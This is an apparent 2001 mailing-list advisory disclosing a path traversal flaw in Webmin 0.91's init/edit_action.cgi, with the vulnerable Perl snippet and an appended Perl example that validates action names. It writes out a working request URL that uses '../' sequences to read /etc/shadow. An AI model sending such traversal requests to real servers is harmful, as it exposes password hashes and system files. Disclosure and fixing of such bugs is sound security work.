webmin 0.91 ../.. problem

From: A. Ramos (aramos@aramos-test.prisacom.int)
Date: Mon Dec 17 2001 - 07:05:05 PST


    	Hello,
    
    	I found a bug in Webmin 0.91.
    
      From the web:
    
    <snip>
    What is Webmin?
    Webmin is a web-based interface for system administration for Unix. Using any browser that supports tables and forms (and Java for the File Manager module), you can setup user accounts, Apache, DNS, file sharing and so on. 
    Webmin consists of a simple web server, and a number of CGI programs which directly update system files like /etc/inetd.conf and /etc/passwd. The web server and all CGI programs are written in Perl version 5, and use no non-standard Perl modules. 
    </snip>
    
    	With this software you can start and stop services as a simple user, and edit init scripts.
     like this: http://www.domain.com:10000/servers/link.cgi/1008341480/init/edit_action.cgi?0+makedev
     but you can use this:
    http://www.domain.com:10000/servers/link.cgi/1008341480/init/edit_action.cgi?0+../../../../../etc/shadow
    
    The problem resides in init/edit_action.cgi:
    <snip>
            open(FILE, $file);
            while(<FILE>) {
                    $data .= $_;
                    if (/^\s*(['"]?)([a-z]+)\1\)/i) {
                            $hasarg{$2}++;
                            }
                    }
            close(FILE);
    </snip>
    	To fix, use your favorite regexp.
    
    	Yes, you can save the file on the server...
    
    --
    Prisacom
    A. Ramos mailto:aramosat_private
    Dpto. Admin. Sistemas
    --
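
An added example, not part of the original post and not Webmin's own code: one way to constrain the action name before the file is opened, as the post's "use your favorite regexp" suggests. The helper names and the temporary directory standing in for the init script directory are assumptions made for illustration.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use Cwd qw(realpath);
use File::Temp qw(tempdir);

# Hypothetical helper: map a requested action name to a file inside $init_dir.
# Returns nothing if the name could resolve outside that directory.
sub action_path {
    my ($init_dir, $name) = @_;
    return unless defined $name;
    # Allow-list: one path component, no "/" and no leading ".".
    return unless $name =~ /\A[A-Za-z0-9_][A-Za-z0-9_.+-]*\z/;
    my $base = realpath($init_dir);
    my $real = realpath("$init_dir/$name");    # follows symlinks
    return unless defined $base && defined $real;
    # After symlink resolution the file must still live under the init directory.
    return unless index($real, "$base/") == 0 && -f $real;
    return $real;
}

# Hypothetical helper: read an init script only if its name passed validation.
sub read_action {
    my ($init_dir, $name) = @_;
    my $path = action_path($init_dir, $name) or return;
    # Three-argument open: the path is never parsed for mode or pipe characters.
    open(my $fh, '<', $path) or return;
    local $/;                                  # slurp the whole file
    my $data = <$fh>;
    close($fh);
    return $data;
}

# Constructed demo: a throwaway directory stands in for the init script directory.
my $dir = tempdir(CLEANUP => 1);
open(my $out, '>', "$dir/makedev") or die "cannot create sample: $!";
print $out "#!/bin/sh\ncase \"\$1\" in\nstart)\n  ;;\nesac\n";
close($out);

for my $name ('makedev', '../../../../../etc/shadow', '/etc/shadow', '.hidden', '') {
    my $data = read_action($dir, $name);
    printf "%-30s %s\n", "'$name'", defined $data ? 'served' : 'rejected';
}
```

Only `makedev` is served; the traversal string from the report, the absolute path, the dot-file and the empty name are all rejected before any `open` call.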
    


